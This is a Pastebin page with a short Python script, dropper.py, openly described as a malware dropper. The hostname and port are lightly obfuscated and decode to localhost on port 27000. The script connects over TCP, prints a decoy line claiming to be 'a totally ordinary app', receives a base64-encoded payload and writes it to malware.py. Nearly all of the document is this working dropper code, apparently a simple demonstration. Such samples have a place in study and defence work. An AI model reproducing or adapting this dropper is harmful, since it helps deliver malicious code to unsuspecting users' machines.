FlyFar

dropper/dropper.py

Oct 19th, 2023
141
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.68 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python3
  2.  
  3. """ Implementation of dropper that downloads malicious code from the server
  4.    and dumps it into a file.
  5. """
  6.  
  7. import base64
  8. import logging
  9. import socket
  10. import math
  11.  
  12.  
  13. class Dropper:
  14.     """ This class represents the implementation of dropper.
  15.    """
  16.  
  17.     def __init__(self, host1, host2, number):
  18.         # Construct hostname of the remote server from the first two
  19.         # arguments.
  20.         self._host = self.decode_hostname(host1, host2)
  21.         # Calculate the port number from the last argument.
  22.         self._port = self.decode_port(number)
  23.         # Initialize socket for the connection.
  24.         self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  25.  
  26.     @property
  27.     def host(self):
  28.         """ Server that sends us the malicious code. """
  29.         return self._host
  30.  
  31.     @host.setter
  32.     def host(self, new_host):
  33.         self._host = new_host
  34.  
  35.     def decode_hostname(self, str1, str2):
  36.         """ Returns hostname of the remote server. """
  37.         return str2[::-1] + str1[::-1]
  38.  
  39.     @property
  40.     def port(self):
  41.         """ Port, on which the server runs (`int`). """
  42.         return self._port
  43.  
  44.     @port.setter
  45.     def port(self, new_port):
  46.         self._port = new_port
  47.  
  48.     def decode_port(self, port):
  49.         """Returns target port of the remote server. """
  50.         return int(math.sqrt(port))
  51.  
  52.     @property
  53.     def socket(self):
  54.         """ Client socket. """
  55.         return self._socket
  56.  
  57.     def dump_data(self, data):
  58.         """ Write the retrieved data from the server into the file.
  59.        """
  60.         with open('malware.py', 'wb') as file:
  61.             file.write(data)
  62.  
  63.     def download_malicious_code(self):
  64.         """ Download malicious code from the server. """
  65.         # Create a connection to the server.
  66.         try:
  67.             self.socket.connect((self.host, self.port))
  68.         except socket.error:
  69.             logging.debug('Dropper could not connect to the server.')
  70.             return
  71.  
  72.         # Try to act as an ordinary application.
  73.         print(
  74.             'Hello, this is a totally ordinary app. '
  75.             'I\'m surely not doing anything malicous'
  76.         )
  77.  
  78.         # Receive the malicious code in the encrypted form.
  79.         command = self.socket.recv(1000)
  80.         # Decode the command and dump it into a file.
  81.         decode_payload = base64.b64decode(command)
  82.         self.dump_data(decode_payload)
  83.  
  84.  
  85. if __name__ == '__main__':
  86.     logging.basicConfig(level=logging.DEBUG)
  87.  
  88.     # Initialize dropper application.
  89.     dropper = Dropper('tsoh', 'lacol', 729000000)
  90.     # Collect the malicious code and dump it into the file.
  91.     dropper.download_malicious_code()
Tags: dropper
Add Comment
Please, Sign In to add comment